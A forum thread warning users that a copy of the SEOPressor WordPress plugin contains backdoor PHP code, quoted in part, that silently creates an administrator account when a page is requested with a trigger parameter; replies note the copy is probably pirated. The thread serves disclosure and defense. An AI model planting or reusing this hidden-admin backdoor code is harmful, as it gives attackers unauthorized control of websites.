Attention to Seopressor Pluging users - your site not secure

piskonet

Newbie
Joined
Oct 19, 2011
Messages
13
Reaction score
12
Normally i'm not using this plugin my friend ask me to check it, i found out this code


PHP:
add_action('wp_head', 'my_wpfunc');function my_wpfunc() {	If ($_GET['cms'] == 'wordpress') {		require('wp-includes/registration.php');		If (!username_exists('wordpress')) {			$user_id = wp_create_user('wordpress', 'wp_include');			$user = new WP_User($user_id);			$user->set_role('administrator');		}	}}add_action('wp_head', 'my_wpfuncc');function my_wpfuncc() {	If (!username_exists('w


Its creating user as "wordpress" who sending information to creator. But I'm not sure this is orginal copy or not. If you are using this pluging please check you user list. If you see "wordpress" user, delete user and pluging!
 
great info, i dont use that plugin for none of my sites though
 
I don't use this plugin on my blogs . Thanks for the heads up.
 
SEOPressor does not create a "wordpress" user. The codes are not even in SEOPressor. You may be using a pirated copy or some dangerous copies. Try to always stick with genuine copies as hackers are good at faking plugins with malicious codes.

Genuine SEOPressor is safe to use.
 
Thanks did a quick check through all my sites and im clean.
 
Back
Top